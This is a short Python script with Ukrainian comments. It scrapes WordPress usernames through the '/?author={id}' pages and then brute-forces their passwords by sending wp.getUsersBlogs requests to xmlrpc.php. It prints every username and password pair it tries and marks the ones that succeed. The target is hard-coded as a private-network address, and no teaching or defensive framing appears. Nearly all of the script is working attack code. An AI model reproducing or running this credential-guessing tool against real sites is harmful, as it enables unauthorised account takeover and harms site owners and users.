import requests, itertools, multiprocessingfrom lxml import html# - - - -

1. import requests, itertools, multiprocessing
2. from lxml import html
3.  
4. # - - - - - - - - - - - Вхідні дані - - - - - - - - - - -
5.  
6. XML = '''
7. <?xml version="1.0" encoding="UTF-8"?>
8. <methodCall>
9. <methodName>wp.getUsersBlogs</methodName>
10. <params>
11. <param>
12.  <value>
13.   <string>{username}</string>
14.  </value>
15. </param>
16. <param>
17.  <value>
18.   <string>{password}</string>
19.  </value>
20. </param>
21. </params>
22. </methodCall>
23. '''
24.  
25. TARGET_URL = 'http://192.168.1.6/xmlrpc.php'
26. AUTHOR_URL = 'http://192.168.1.6/?author={id}'
27.  
28. # - - - - - - - - - - - - - - - - - - - - - - - - - - -
29.  
30. def wrap_creds_in_xml(username="", password=""):
31.     """З XML беремо username і password"""
32.     return XML.format(username=username, password=password)
33.  
34.  
35. def is_correct(text=""):
36.     """Записуємо лише успішні моменти підбору пароля"""
37.     constant = 'Incorrect username or password'
38.     return constant not in text
39.  
40.  
41. def get_usernames():
42.     """Парсимо користувачів по /?author={id}"""
43.     start_id = 1
44.     f = open('C:\\Users\\xStevex\\Desktop\\username.txt', 'w')
45.  
46.     while True:
47.         r = requests.get(AUTHOR_URL.format(id=start_id))
48.         tree = html.fromstring(r.content)
49.         title = tree.findtext('.//title')
50.         if "Page not found – user's Blog!" in title:
51.             f.close()
52.             break
53.  
54.         f.write(title.split()[0] + '\n')
55.         start_id += 1
56.  
57.     with open('C:\\Users\\xStevex\\Desktop\\username.txt') as file:
58.         text_as_string = file.read()
59.         return text_as_string.split()
60.  
61. def get_passwords():
62.     """Підтягуємо паролі"""
63.     with open('C:\\Users\\xStevex\\Desktop\\passwords.txt') as file:
64.         text_as_string = file.read()
65.         return text_as_string.split('\n')
66.  
67. def main():
68.     """Сам процес бруртфорсу"""
69.     users = get_usernames()
70.     passwords = get_passwords()
71.  
72.     for user, password in itertools.product(users, passwords):
73.         payload = wrap_creds_in_xml(username=user, password=password)
74.         response = requests.post(TARGET_URL, payload)
75.         correct = is_correct(text=response.text)
76.         if correct:
77.             print('[+] {}/{}'. format(user, password))
78.         elif not correct:
79.             print('[-] {}/{} '.format(user, password))
80.         else:
81.             exit()
82.  
83. # - - - - - - - - - - - MAIN - - - - - - - - - - -
84. if __name__ == '__main__':
85.     # p1 = multiprocessing.Process(target=wrap_creds_in_xml)
86.     # p2 = multiprocessing.Process(target=is_correct)
87.     # p3 = multiprocessing.Process(target=get_passwords)
88.     # p4 = multiprocessing.Process(target=get_usernames)
89.     p5 = multiprocessing.Process(target=main)
90.     #
91.     # p1.start()
92.     # p2.start()
93.     # p3.start()
94.     # p4.start()
95.     p5.start()
96.     #
97.     # p1.join()
98.     # p2.join()
99.     # p3.join()
100.     # p4.join()
101.     # p5.join()